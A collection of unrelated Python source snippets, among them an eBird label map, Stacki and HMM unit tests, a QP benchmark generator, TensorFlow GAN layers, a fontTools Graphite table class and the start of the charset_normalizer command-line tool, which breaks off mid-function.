'ruckin': 'Regulus calendula_Ruby-crowned Kinglet',
'rudduc': 'Oxyura jamaicensis_Ruddy Duck',
'rufgro': 'Bonasa umbellus_Ruffed Grouse',
'rufhum': 'Selasphorus rufus_Rufous Hummingbird',
'rusbla': 'Euphagus carolinus_Rusty Blackbird',
'sagspa1': 'Artemisiospiza nevadensis_Sagebrush Sparrow',
'sagthr': 'Oreoscoptes montanus_Sage Thrasher',
'savspa': 'Passerculus sandwichensis_Savannah Sparrow',
'saypho': "Sayornis saya_Say's Phoebe",
'scatan': 'Piranga olivacea_Scarlet Tanager',
'scoori': "Icterus parisorum_Scott's Oriole",
'semplo': 'Charadrius semipalmatus_Semipalmated Plover',
'semsan': 'Calidris pusilla_Semipalmated Sandpiper',
'sheowl': 'Asio flammeus_Short-eared Owl',
'shshaw': 'Accipiter striatus_Sharp-shinned Hawk',
'snobun': 'Plectrophenax nivalis_Snow Bunting',
'snogoo': 'Anser caerulescens_Snow Goose',
'solsan': 'Tringa solitaria_Solitary Sandpiper',
'sonspa': 'Melospiza melodia_Song Sparrow',
'sora': 'Porzana carolina_Sora',
'sposan': 'Actitis macularius_Spotted Sandpiper',
'spotow': 'Pipilo maculatus_Spotted Towhee',
'stejay': "Cyanocitta stelleri_Steller's Jay",
'swahaw': "Buteo swainsoni_Swainson's Hawk",
'swaspa': 'Melospiza georgiana_Swamp Sparrow',
'swathr': "Catharus ustulatus_Swainson's Thrush",
'treswa': 'Tachycineta bicolor_Tree Swallow',
'truswa': 'Cygnus buccinator_Trumpeter Swan',
'tuftit': 'Baeolophus bicolor_Tufted Titmouse',
'tunswa': 'Cygnus columbianus_Tundra Swan',
'veery': 'Catharus fuscescens_Veery',
'vesspa': 'Pooecetes gramineus_Vesper Sparrow',
'vigswa': 'Tachycineta thalassina_Violet-green Swallow',
'warvir': 'Vireo gilvus_Warbling Vireo',
'wesblu': 'Sialia mexicana_Western Bluebird',
'wesgre': 'Aechmophorus occidentalis_Western Grebe',
'weskin': 'Tyrannus verticalis_Western Kingbird',
'wesmea': 'Sturnella neglecta_Western Meadowlark',
'wessan': 'Calidris mauri_Western Sandpiper',
'westan': 'Piranga ludoviciana_Western Tanager',
'wewpew': 'Contopus sordidulus_Western Wood-Pewee',
'whbnut': 'Sitta carolinensis_White-breasted Nuthatch',
'whcspa': 'Zonotrichia leucophrys_White-crowned Sparrow',
'whfibi': 'Plegadis chihi_White-faced Ibis',
'whtspa': 'Zonotrichia albicollis_White-throated Sparrow',
'whtswi': 'Aeronautes saxatalis_White-throated Swift',
'wilfly': 'Empidonax traillii_Willow Flycatcher',
'wilsni1': "Gallinago delicata_Wilson's Snipe",
'wiltur': 'Meleagris gallopavo_Wild Turkey',
'winwre3': 'Troglodytes hiemalis_Winter Wren',
'wlswar': "Cardellina pusilla_Wilson's Warbler",
'wooduc': 'Aix sponsa_Wood Duck',
'wooscj2': "Aphelocoma woodhouseii_Woodhouse's Scrub-Jay",
'woothr': 'Hylocichla mustelina_Wood Thrush',
'y00475': 'Fulica americana_American Coot',
'yebfly': 'Empidonax flaviventris_Yellow-bellied Flycatcher',
'yebsap': 'Sphyrapicus varius_Yellow-bellied Sakpsucker',
'yehbla': 'Xanthocephalus xanthocephalus_Yellow-headed Blackbird',
'yelwar': 'Setophaga petechia_Yellow Warbler',
'yerwar': 'Setophaga coronata_Yellow-rumped Warbler',
'yetvir': 'Vireo flavifrons_Yellow-throated Vireo'}
INV_EBIRD_LABEL = {v: k for k, v in EBIRD_LABEL.items()}
|
1689820
|
from unittest.mock import create_autospec, ANY, patch, call
import pytest
from stack.commands import DatabaseConnection
from stack.commands.remove.host.firmware.mapping import Command
from stack.exception import CommandError
from stack.commands.remove.host.firmware.mapping.plugin_basic import Plugin
class TestRemoveHostFirmwareMappingBasicPlugin:
"""A test case for the remove host firmware mapping basic plugin."""
@pytest.fixture
def basic_plugin(self):
"""A fixture that returns the plugin instance for use in tests.
This sets up the required mocks needed to construct the plugin class.
"""
mock_command = create_autospec(
spec = Command,
instance = True,
)
mock_command.db = create_autospec(
spec = DatabaseConnection,
spec_set = True,
instance = True,
)
return Plugin(command = mock_command)
def test_provides(self, basic_plugin):
"""Ensure that provides returns 'basic'."""
assert basic_plugin.provides() == "basic"
def test_validate_make(self, basic_plugin):
"""Ensure the make is validated if it exists."""
mock_make = "foo"
basic_plugin.validate_make(make = mock_make)
basic_plugin.owner.ensure_make_exists.assert_called_once_with(
make = mock_make,
)
def test_validate_make_not_provided(self, basic_plugin):
"""Ensure the make is not validated if not provided."""
mock_make = ""
basic_plugin.validate_make(make = mock_make)
basic_plugin.owner.ensure_make_exists.assert_not_called()
def test_validate_make_error(self, basic_plugin):
"""Ensure that validation fails when the make is invalid."""
mock_make = "foo"
basic_plugin.owner.ensure_make_exists.side_effect = CommandError(
cmd = basic_plugin.owner,
msg = "Test error",
)
with pytest.raises(CommandError):
basic_plugin.validate_make(make = mock_make)
def test_validate_model(self, basic_plugin):
"""Ensure the model is validated if it exists."""
mock_make = "foo"
mock_model = "bar"
basic_plugin.validate_model(make = mock_make, model = mock_model)
basic_plugin.owner.ensure_model_exists.assert_called_once_with(
make = mock_make,
model = mock_model,
)
def test_validate_model_not_provided(self, basic_plugin):
"""Ensure the model is not validated if not provided."""
mock_make = "foo"
mock_model = ""
basic_plugin.validate_model(make = mock_make, model = mock_model)
basic_plugin.owner.ensure_model_exists.assert_not_called()
def test_validate_model_error(self, basic_plugin):
"""Ensure that validation fails when the model is invalid."""
mock_make = "foo"
mock_model = "bar"
basic_plugin.owner.ensure_model_exists.side_effect = CommandError(
cmd = basic_plugin.owner,
msg = "Test error",
)
with pytest.raises(CommandError):
basic_plugin.validate_model(make = mock_make, model = mock_model)
@pytest.mark.parametrize(
"hosts, versions, make, model",
(
(["foo"], ["bar"], "baz", "bag"),
(["foo"], [], "baz", "bag"),
(["foo"], [], "baz", ""),
(["foo"], [], "", ""),
([], ["bar"], "baz", "bag"),
([], [], "baz", "bag"),
([], [], "baz", ""),
([], [], "", ""),
)
)
def test_get_firmware_mappings_to_remove(self, hosts, versions, make, model, basic_plugin):
"""Test that get_firmware_mappings_to_remove works as expected for every valid argument combination."""
test_inputs = {
"hosts": hosts,
"versions": versions,
"make": make,
"model": model,
}
basic_plugin.owner.db.select.return_value = [["1"]]
expected_query_params = list(value for value in test_inputs.values() if value)
assert [basic_plugin.owner.db.select.return_value[0][0]] == basic_plugin.get_firmware_mappings_to_remove(**test_inputs)
basic_plugin.owner.db.select.assert_called_once_with(ANY, expected_query_params)
@patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
@patch.object(target = Plugin, attribute = "validate_model", autospec = True)
@patch.object(target = Plugin, attribute = "validate_make", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
def test_run(
self,
mock_unique_everseen,
mock_lowered,
mock_validate_make,
mock_validate_model,
mock_get_firmware_mappings_to_remove,
basic_plugin,
):
"""Test that run works as expected when all params and args are provided and valid."""
mock_args = ["foo", "bar"]
expected_hosts = tuple(mock_args)
mock_params = {"make": "fizz", "model": "buzz", "versions": "bazz, bang"}
expected_versions = tuple(version.strip() for version in mock_params["versions"].split(",") if version.strip())
mock_lowered.return_value = mock_params.values()
mock_unique_everseen.side_effect = (
mock_args,
expected_versions,
)
basic_plugin.owner.getHosts.return_value = expected_hosts
mock_get_firmware_mappings_to_remove.return_value = ["1", "2"]
basic_plugin.run(args = (mock_params, mock_args))
assert [call(mock_args), call(basic_plugin.owner.fillParams.return_value)] == mock_lowered.mock_calls
mock_unique_everseen.assert_any_call(mock_lowered.return_value)
# Check the generator expression passed to the second call of unique_everseen
assert tuple(mock_unique_everseen.call_args_list[1][0][0]) == expected_versions
basic_plugin.owner.getHosts.assert_called_once_with(args = expected_hosts)
basic_plugin.owner.fillParams.assert_called_once_with(
names = [
("make", ""),
("model", ""),
("versions", ""),
],
params = mock_params,
)
mock_validate_make.assert_called_once_with(
basic_plugin,
make = mock_params["make"],
)
mock_validate_model.assert_called_once_with(
basic_plugin,
make = mock_params["make"],
model = mock_params["model"],
)
basic_plugin.owner.ensure_firmwares_exist.assert_called_once_with(
make = mock_params["make"],
model = mock_params["model"],
versions = expected_versions,
)
mock_get_firmware_mappings_to_remove.assert_called_once_with(
basic_plugin,
hosts = expected_hosts,
make = mock_params["make"],
model = mock_params["model"],
versions = expected_versions,
)
basic_plugin.owner.db.execute.assert_called_once_with(
ANY,
(mock_get_firmware_mappings_to_remove.return_value,),
)
@patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
@patch.object(target = Plugin, attribute = "validate_model", autospec = True)
@patch.object(target = Plugin, attribute = "validate_make", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
def test_run_no_hosts_or_versions(
self,
mock_unique_everseen,
mock_lowered,
mock_validate_make,
mock_validate_model,
mock_get_firmware_mappings_to_remove,
basic_plugin,
):
"""Test that run works as expected when hosts and versions are not provided."""
mock_args = []
expected_hosts = tuple(mock_args)
mock_params = {"make": "fizz", "model": "buzz", "versions": ""}
mock_lowered.return_value = mock_params.values()
mock_unique_everseen.return_value = mock_args
mock_get_firmware_mappings_to_remove.return_value = ["1", "2"]
basic_plugin.run(args = (mock_params, mock_args))
assert [call(mock_args), call(basic_plugin.owner.fillParams.return_value)] == mock_lowered.mock_calls
mock_unique_everseen.assert_called_once_with(mock_lowered.return_value)
basic_plugin.owner.getHosts.assert_not_called()
basic_plugin.owner.fillParams.assert_called_once_with(
names = [
("make", ""),
("model", ""),
("versions", ""),
],
params = mock_params,
)
mock_validate_make.assert_called_once_with(
basic_plugin,
make = mock_params["make"],
)
mock_validate_model.assert_called_once_with(
basic_plugin,
make = mock_params["make"],
model = mock_params["model"],
)
basic_plugin.owner.ensure_firmwares_exist.assert_not_called()
mock_get_firmware_mappings_to_remove.assert_called_once_with(
basic_plugin,
hosts = expected_hosts,
make = mock_params["make"],
model = mock_params["model"],
versions = mock_params["versions"],
)
basic_plugin.owner.db.execute.assert_called_once_with(
ANY,
(mock_get_firmware_mappings_to_remove.return_value,),
)
@patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
@patch.object(target = Plugin, attribute = "validate_model", autospec = True)
@patch.object(target = Plugin, attribute = "validate_make", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
def test_run_no_mappings_to_remove(
self,
mock_unique_everseen,
mock_lowered,
mock_validate_make,
mock_validate_model,
mock_get_firmware_mappings_to_remove,
basic_plugin,
):
"""Test that run works as expected when there are no mappings to remove."""
mock_args = ["foo", "bar"]
expected_hosts = tuple(mock_args)
mock_params = {"make": "fizz", "model": "buzz", "versions": "bazz, bang"}
expected_versions = tuple(version.strip() for version in mock_params["versions"].split(",") if version.strip())
mock_lowered.return_value = mock_params.values()
mock_unique_everseen.side_effect = (
mock_args,
expected_versions,
)
basic_plugin.owner.getHosts.return_value = expected_hosts
mock_get_firmware_mappings_to_remove.return_value = []
basic_plugin.run(args = (mock_params, mock_args))
assert [call(mock_args), call(basic_plugin.owner.fillParams.return_value)] == mock_lowered.mock_calls
mock_unique_everseen.assert_any_call(mock_lowered.return_value)
# Check the generator expression passed to the second call of unique_everseen
assert tuple(mock_unique_everseen.call_args_list[1][0][0]) == expected_versions
basic_plugin.owner.getHosts.assert_called_once_with(args = expected_hosts)
basic_plugin.owner.fillParams.assert_called_once_with(
names = [
("make", ""),
("model", ""),
("versions", ""),
],
params = mock_params,
)
mock_validate_make.assert_called_once_with(
basic_plugin,
make = mock_params["make"],
)
mock_validate_model.assert_called_once_with(
basic_plugin,
make = mock_params["make"],
model = mock_params["model"],
)
basic_plugin.owner.ensure_firmwares_exist.assert_called_once_with(
make = mock_params["make"],
model = mock_params["model"],
versions = expected_versions,
)
mock_get_firmware_mappings_to_remove.assert_called_once_with(
basic_plugin,
hosts = expected_hosts,
make = mock_params["make"],
model = mock_params["model"],
versions = expected_versions,
)
basic_plugin.owner.db.execute.assert_not_called()
@pytest.mark.parametrize("failure_mock", ("validate_make", "validate_model", "ensure_firmwares_exist"))
@patch.object(target = Plugin, attribute = "get_firmware_mappings_to_remove", autospec = True)
@patch.object(target = Plugin, attribute = "validate_model", autospec = True)
@patch.object(target = Plugin, attribute = "validate_make", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.lowered", autospec = True)
@patch(target = "stack.commands.remove.host.firmware.mapping.plugin_basic.unique_everseen", autospec = True)
def test_run_errors(
self,
mock_unique_everseen,
mock_lowered,
mock_validate_make,
mock_validate_model,
mock_get_firmware_mappings_to_remove,
failure_mock,
basic_plugin,
):
"""Test that run fails when the params or args are invalid."""
mock_args = ["foo", "bar"]
expected_hosts = tuple(mock_args)
mock_params = {"make": "fizz", "model": "buzz", "versions": "bazz, bang"}
expected_versions = tuple(version.strip() for version in mock_params["versions"].split(",") if version.strip())
mock_lowered.return_value = mock_params.values()
mock_unique_everseen.side_effect = (
mock_args,
expected_versions,
)
basic_plugin.owner.getHosts.return_value = expected_hosts
mock_validation_functions = {
"validate_make": mock_validate_make,
"validate_model": mock_validate_model,
"ensure_firmwares_exist": basic_plugin.owner.ensure_firmwares_exist,
}
mock_validation_functions[failure_mock].side_effect = CommandError(
cmd = basic_plugin.owner,
msg = "test error",
)
with pytest.raises(CommandError):
basic_plugin.run(args = (mock_params, mock_args))
basic_plugin.owner.db.execute.assert_not_called()
|
1689852
|
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.join(BASE_DIR, os.pardir)
DATA_DIR = os.path.join(ROOT_DIR,'Data')
mesh_top_dir = os.path.join(DATA_DIR,'GraspNet')
scan_result_dir = os.path.join(DATA_DIR,'BlensorResult')
CommandFile_dir = os.path.join(DATA_DIR,'CommandFiles')
|
1689864
|
from __future__ import print_function
import unittest
from unittest import TestCase
import numpy as np
from numpy.testing import assert_, assert_raises
from numpy.testing import assert_array_equal, assert_array_almost_equal
from hmmlearn.utils import normalize
from autohmm import tm
np.seterr(all='warn')
def test_precision_prior_wrong_nb():
with assert_raises(ValueError):
m = tm.THMM(n_unique = 2)
m.precision_prior_ = np.array([0.7, 0.8, 0.9])
def test_precision_prior_unique():
m = tm.THMM(n_unique = 2, n_tied = 1)
m.precision_prior_ = np.array([[0.7], [0.3]])
correct_prior = np.array([0.7, 0.7, 0.3, 0.3])
correct_prior = correct_prior.reshape(4, 1, 1)
assert_array_equal(m._precision_prior_, correct_prior)
def fit_hmm_and_monitor_log_likelihood(h, X, n_iter=1):
#h.n_iter = 1 # make sure we do a single iteration at a time
#h.init_params = '' # and don't re-init params
h.fit(X)
loglikelihoods = np.empty(n_iter, dtype=float)
#for i in range(n_iter):
# h.fit(X)
# loglikelihoods[i], _ = h.score_samples(X)
return loglikelihoods
class PlainGaussianHMM(TestCase):
def setUp(self):
self.prng = np.random.RandomState(2)
self.n_unique = 2
self.n_components = 2
self.startprob = np.array([0.6, 0.4])
self.transmat = np.array([[0.7, 0.3],
[0.4, 0.6]])
self.mu = np.array([0.7, -2.0])
self.precision = np.array([[500.],
[250.]])
self.h = tm.THMM(n_unique=self.n_unique,
random_state=self.prng,
init_params = 'stmw',
precision_bounds = np.array([-1e5, 1e5]))
self.h.startprob_ = self.startprob
self.h.transmat_ = self.transmat
self.h.mu_ = self.mu
self.h.precision_ = self.precision
def test_fit(self, params='sptmw', **kwargs):
h = self.h
h.params = params
lengths = 70000
X, _state_sequence = h.sample(lengths, random_state=self.prng)
h.precision_ = np.array([[700],
[150]])
h.mu_ = np.array([2.6, 3.4])
h.transmat_ = np.array([[0.85, 0.15],
[0.2, 0.8]])
# TODO: Test more parameters, generate test cases
trainll = fit_hmm_and_monitor_log_likelihood(h, X)
# Check that the log-likelihood is always increasing during training.
#diff = np.diff(trainll)
#self.assertTrue(np.all(diff >= -1e-6),
# "Decreasing log-likelihood: {0}" .format(diff))
assert_array_almost_equal(h.mu_.reshape(-1),
self.mu.reshape(-1), decimal=1)
assert_array_almost_equal(h.transmat_.reshape(-1),
self.transmat.reshape(-1), decimal=1)
assert_array_almost_equal(h.precision_.reshape(-1)/100,
self.precision.reshape(-1)/100, decimal =1)
class MultivariateGaussianHMM(TestCase):
def setUp(self):
self.prng = np.random.RandomState(2)
self.n_tied = 2
self.n_features = 2
self.startprob = np.array([0.6, 0.4])
self.transmat = np.array([[0.7, 0.3], [0.4, 0.6]])
self.mu = np.array([[4.5, -1.5],
[-0.7, -10.4]])
self.precision = np.array([[[0.5, 0.15],
[0.15, 0.4]],
[[0.6, 0.1],
[0.1, 0.35]]])
self.h = tm.THMM(n_unique=2, n_tied =self.n_tied,
n_features=self.n_features,
random_state=self.prng,
precision_bounds=np.array([-1e5, 1e5]),
init_params = 'stmaw', params='stmapw')
self.h.startprob_ = self.startprob
self.h.transmat_ = self.transmat
self.h.mu_ = self.mu
self.h.precision_ = self.precision
def test_fit(self, params='stmpaw', **kwargs):
h = self.h
h.params = params
lengths = 100000
X, _state_sequence = h.sample(lengths, random_state=self.prng)
# Perturb
h.precision_ = np.array([[[0.4, 0.12],
[0.12, 0.45]],
[[0.7, 0.2],
[0.2, 0.5]]])
h.transmat_ = np.array([[0.5, 0.5], [0.2, 0.8]])
h.mu_ = np.array([[5.8, -0.1],
[-3.3, -9.6]])
self.transmat = np.array([[0.7, 0.3, 0, 0, 0, 0],
[0, 0.7, 0.3, 0, 0, 0],
[0, 0, 0.7, 0.3, 0, 0],
[0, 0, 0, 0.6, 0.4, 0],
[0, 0, 0, 0, 0.6, 0.4],
[0.4, 0, 0, 0, 0, 0.6]])
# TODO: Test more parameters, generate test cases
trainll = fit_hmm_and_monitor_log_likelihood(h, X)
# Check that the log-likelihood is always increasing during training.
#diff = np.diff(trainll)
#self.assertTrue(np.all(diff >= -1e-6),
# "Decreasing log-likelihood: {0}" .format(diff))
assert_array_almost_equal(h.transmat_.reshape(-1),
self.transmat.reshape(-1), decimal=1)
assert_array_almost_equal(h.mu_.reshape(-1),
self.mu.reshape(-1), decimal=1)
assert_array_almost_equal(h.precision_.reshape(-1),
self.precision.reshape(-1), decimal=1)
class TiedGaussianHMM(TestCase):
def setUp(self):
self.prng = np.random.RandomState(42)
self.n_tied = 2
self.n_unique = 2
self.startprob = np.array([0.6, 0.4])
self.transmat = np.array([[0.7, 0.3],
[0.4, 0.6]])
self.precision = np.array([[0.5],
[0.3]])
self.mu = np.array([[0.7],
[-2.0]])
self.h = tm.THMM(n_unique=self.n_unique, n_tied =self.n_tied, random_state=self.prng,
precision_bounds=np.array([-1e5, 1e5]), init_params = 'stmaw')
self.h.startprob_ = self.startprob
self.h.transmat_ = self.transmat
self.h.mu_ = self.mu
self.h.precision_ = self.precision
def test_fit(self, params='stmpaw', **kwargs):
h = self.h
h.params = params
lengths = 70000
X, _state_sequence = h.sample(lengths, random_state=self.prng)
h.mu_ = np.array([[3.5],
[-3.9]])
h.transmat_ = np.array([[0.9, 0.1],
[0.7, 0.3]])
h.precision_ = np.array([[0.4],
[0.2]])
self.transmat = np.array([[0.7, 0.3, 0, 0, 0, 0],
[0, 0.7, 0.3, 0, 0, 0],
[0, 0, 0.7, 0.3, 0, 0],
[0, 0, 0, 0.6, 0.4, 0],
[0, 0, 0, 0, 0.6, 0.4],
[0.4, 0, 0, 0, 0, 0.6]])
# TODO: Test more parameters, generate test cases
trainll = fit_hmm_and_monitor_log_likelihood(h, X)
# Check that the log-likelihood is always increasing during training.
#diff = np.diff(trainll)
#self.assertTrue(np.all(diff >= -1e-6),
# "Decreasing log-likelihood: {0}" .format(diff))
assert_array_almost_equal(h.mu_.reshape(-1),
self.mu.reshape(-1), decimal=1)
assert_array_almost_equal(h.transmat_.reshape(-1),
self.transmat.reshape(-1), decimal=1)
assert_array_almost_equal(h.precision_.reshape(-1),
self.precision.reshape(-1), decimal=1)
if __name__ == '__main__':
unittest.main()
|
1689883
|
import numpy as np
import scipy.sparse as spa
import cvxpy
class RandomQPExample(object):
'''
Random QP example
'''
def __init__(self, n, seed=1):
'''
Generate problem in QP format and CVXPY format
'''
# Set random seed
np.random.seed(seed)
m = int(n * 10)
# Generate problem data
self.n = int(n)
self.m = m
P = spa.random(n, n, density=0.15,
data_rvs=np.random.randn,
format='csc')
self.P = P.dot(P.T).tocsc() + 1e-02 * spa.eye(n)
self.q = np.random.randn(n)
self.A = spa.random(m, n, density=0.15,
data_rvs=np.random.randn,
format='csc')
v = np.random.randn(n) # Fictitious solution
delta = np.random.rand(m) # To get inequality
self.u = self.A@v + delta
self.l = - np.inf * np.ones(m) # self.u - np.random.rand(m)
self.qp_problem = self._generate_qp_problem()
self.cvxpy_problem = self._generate_cvxpy_problem()
@staticmethod
def name():
return 'Random QP'
def _generate_qp_problem(self):
'''
Generate QP problem
'''
problem = {}
problem['P'] = self.P
problem['q'] = self.q
problem['A'] = self.A
problem['l'] = self.l
problem['u'] = self.u
problem['m'] = self.A.shape[0]
problem['n'] = self.A.shape[1]
return problem
def _generate_cvxpy_problem(self):
'''
Generate QP problem
'''
x_var = cvxpy.Variable(self.n)
objective = .5 * cvxpy.quad_form(x_var, self.P) + self.q * x_var
constraints = [self.A * x_var <= self.u, self.A * x_var >= self.l]
problem = cvxpy.Problem(cvxpy.Minimize(objective), constraints)
return problem
def revert_cvxpy_solution(self):
'''
Get QP primal and duar variables from cvxpy solution
'''
variables = self.cvxpy_problem.variables()
constraints = self.cvxpy_problem.constraints
# primal solution
x = variables[0].value
# dual solution
y = constraints[0].dual_value - constraints[1].dual_value
return x, y
|
1689889
|
from kratos import *
class SW_NET(Generator):
'''
The switching network will bring in multiple items per cycle and direct
them to the appropriate aggregation buffer
'''
def __init__(self,
interconnect_in,
offsets, # Offset between the interconnect_in ports
data_width,
memory_width, # Will be the size of the agg buffer
num_aggregators,
num_banks,
stride_0):
super().__init__("sw_net")
self.interconnect_in = interconnect_in
self.offsets = offsets
self.data_width = data_width
self.memory_width = memory_width
self.num_aggregators = num_aggregators
self.num_banks = num_banks
self.stride_0 = stride_0
# PORT DEFS: begin
self._clk = self.clock("clk")
self._clk_en = self.input("clk_en", 1)
self._reset = self.reset("reset")
self._flush = self.input("flush", 1)
self._data_in = self.input("data_in",
data_width,
size=interconnect_in,
packed=True,
explicit_array=True) # Actually an array
self._valid_in = self.input("valid_in", interconnect_in)
self._data_out # should be interconnect_in as well - basically a single stage input pipe
self._agg_index_out # should be the num_aggregators
self._valid_out # Should be the num of banks
# Somehow get data to the output ->
# probably with an address -> which will be 0-num_aggregators
# Then tag it with valid or not
|
1689894
|
from codebase.models.extra_layers import leaky_relu, wndense, noise, wnconv2d, wnconv2d_transpose, scale_gradient
import tensorflow as tf
from tensorflow.contrib.framework import arg_scope
from tensorbayes.layers import dense, conv2d, conv2d_transpose, upsample, avg_pool, max_pool, batch_norm, instance_norm
from codebase.args import args
dropout = tf.layers.dropout
def discriminator(x, phase, reuse=None):
with tf.variable_scope('disc/gan', reuse=reuse):
with arg_scope([wnconv2d, wndense], activation=leaky_relu), \
arg_scope([noise], phase=phase):
x = dropout(x, rate=0.2, training=phase)
x = wnconv2d(x, 64, 3, 2)
x = dropout(x, training=phase)
x = wnconv2d(x, 128, 3, 2)
x = dropout(x, training=phase)
x = wnconv2d(x, 256, 3, 2)
x = dropout(x, training=phase)
x = wndense(x, 1024)
q = dense(x, args.Y, activation=None, bn=False)
d = dense(x, 1, activation=None, bn=False)
return d, q
def generator(x, y, phase, reuse=None):
with tf.variable_scope('gen', reuse=reuse):
with arg_scope([dense], bn=True, phase=phase, activation=tf.nn.relu), \
arg_scope([conv2d_transpose], bn=True, phase=phase, activation=tf.nn.relu):
if y is not None:
x = tf.concat([x, y], 1)
x = dense(x, 4 * 4 * 512)
x = tf.reshape(x, [-1, 4, 4, 512])
x = conv2d_transpose(x, 256, 5, 2)
x = conv2d_transpose(x, 128, 5, 2)
x = wnconv2d_transpose(x, 1, 5, 2, bn=False, activation=tf.nn.tanh, scale=True)
return x
|
1689901
|
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.misc import sstruct
from fontTools.misc.textTools import safeEval
from . import DefaultTable
import array
import sys
Gloc_header = '''
> # big endian
version: 16.16F # Table version
flags: H # bit 0: 1=long format, 0=short format
# bit 1: 1=attribute names, 0=no names
numAttribs: H # NUmber of attributes
'''
class table_G__l_o_c(DefaultTable.DefaultTable):
"""
Support Graphite Gloc tables
"""
dependencies = ['Glat']
def __init__(self, tag=None):
DefaultTable.DefaultTable.__init__(self, tag)
self.attribIds = None
self.numAttribs = 0
def decompile(self, data, ttFont):
_, data = sstruct.unpack2(Gloc_header, data, self)
flags = self.flags
del self.flags
self.locations = array.array('I' if flags & 1 else 'H')
self.locations.fromstring(data[:len(data) - self.numAttribs * (flags & 2)])
if sys.byteorder != "big": self.locations.byteswap()
self.attribIds = array.array('H')
if flags & 2:
self.attribIds.fromstring(data[-self.numAttribs * 2:])
if sys.byteorder != "big": self.attribIds.byteswap()
def compile(self, ttFont):
data = sstruct.pack(Gloc_header, dict(version=1.0,
flags=(bool(self.attribIds) << 1) + (self.locations.typecode == 'I'),
numAttribs=self.numAttribs))
if sys.byteorder != "big": self.locations.byteswap()
data += self.locations.tostring()
if sys.byteorder != "big": self.locations.byteswap()
if self.attribIds:
if sys.byteorder != "big": self.attribIds.byteswap()
data += self.attribIds.tostring()
if sys.byteorder != "big": self.attribIds.byteswap()
return data
def set(self, locations):
long_format = max(locations) >= 65536
self.locations = array.array('I' if long_format else 'H', locations)
def toXML(self, writer, ttFont):
writer.simpletag("attributes", number=self.numAttribs)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
if name == 'attributes':
self.numAttribs = int(safeEval(attrs['number']))
def __getitem__(self, index):
return self.locations[index]
def __len__(self):
return len(self.locations)
def __iter__(self):
return iter(self.locations)
|
1689921
|
import argparse
import sys
from os.path import abspath
from json import dumps
from charset_normalizer import from_fp
from charset_normalizer.models import CliDetectionResult
from charset_normalizer.version import __version__
from platform import python_version
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input
"""
valid = {"yes": True, "y": True, "ye": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
def cli_detect(argv=None):
"""
CLI assistant using ARGV and ArgumentParser
:param argv:
:return: 0 if everything is fine, anything else equal trouble
"""
parser = argparse.ArgumentParser(
description="The Real First Universal Charset Detector. "
"Discover originating encoding used on text file. "
"Normalize text to unicode."
)
parser.add_argument('files', type=argparse.FileType('rb'), nargs='+', help='File(s) to be analysed')
parser.add_argument('-v', '--verbose', action="store_true", default=False, dest='verbose',
help='Display complementary information about file if any. Stdout will contain logs about the detection process.')
parser.add_argument('-a', '--with-alternative', action="store_true", default=False, dest='alternatives',
help='Output complementary possibilities if any. Top-level JSON WILL be a list.')
parser.add_argument('-n', '--normalize', action="store_true", default=False, dest='normalize',
help='Permit to normalize input file. If not set, program does not write anything.')
parser.add_argument('-m', '--minimal', action="store_true", default=False, dest='minimal',
help='Only output the charset detected to STDOUT. Disabling JSON output.')
parser.add_argument('-r', '--replace', action="store_true", default=False, dest='replace',
help='Replace file when trying to normalize it instead of creating a new one.')
parser.add_argument('-f', '--force', action="store_true", default=False, dest='force',
help='Replace file without asking if you are sure, use this flag with caution.')
parser.add_argument('-t', '--threshold', action="store", default=0.1, type=float, dest='threshold',
help="Define a custom maximum amount of chaos allowed in decoded content. 0. <= chaos <= 1.")
parser.add_argument(
"--version",
action="version",
version="Charset-Normalizer {} - Python {}".format(__version__, python_version()),
help="Show version information and exit."
)
args = parser.parse_args(argv)
if args.replace is True and args.normalize is False:
print('Use --replace in addition of --normalize only.', file=sys.stderr)
return 1
if args.force is True and args.replace is False:
print('Use --force in addition of --replace only.', file=sys.stderr)
return 1
if args.threshold < 0. or args.threshold > 1.:
print('--threshold VALUE should be between 0. AND 1.', file=sys.stderr)
return 1
for my_file in args.files:
matches = from_fp(
my_file,
threshold=args.threshold,
explain=args.verbose
)
if len(matches) == 0:
print('Unable to identify originating encoding for "{}". {}'.format(my_file.name, 'Maybe try increasing maximum amount of chaos.' if args.threshold < 1. else ''), file=sys.stderr)
if my_file.closed is False:
my_file.close()
continue
x_ = []
r_ = matches.best()
p_ = r_.first()
x_.append(
CliDetectionResult(
abspath(my_file.name),
p_.encoding,
p_.encoding_aliases,
[cp for cp in p_.could_be_from_charset if cp != p_.encoding],
p_.language,
p_.alphabets,
p_.bom,
p_.percent_chaos,
p_.percent_coherence,
None,
True
)
)
if len(matches) > 1 and args.alternatives:
for el in matches:
if el != p_:
x_.append(
CliDetectionResult(
abspath(my_file.name),
el.encoding,
el.encoding_aliases,
[cp for cp in el.could_be_from_charset if cp != el.encoding],
el.language,
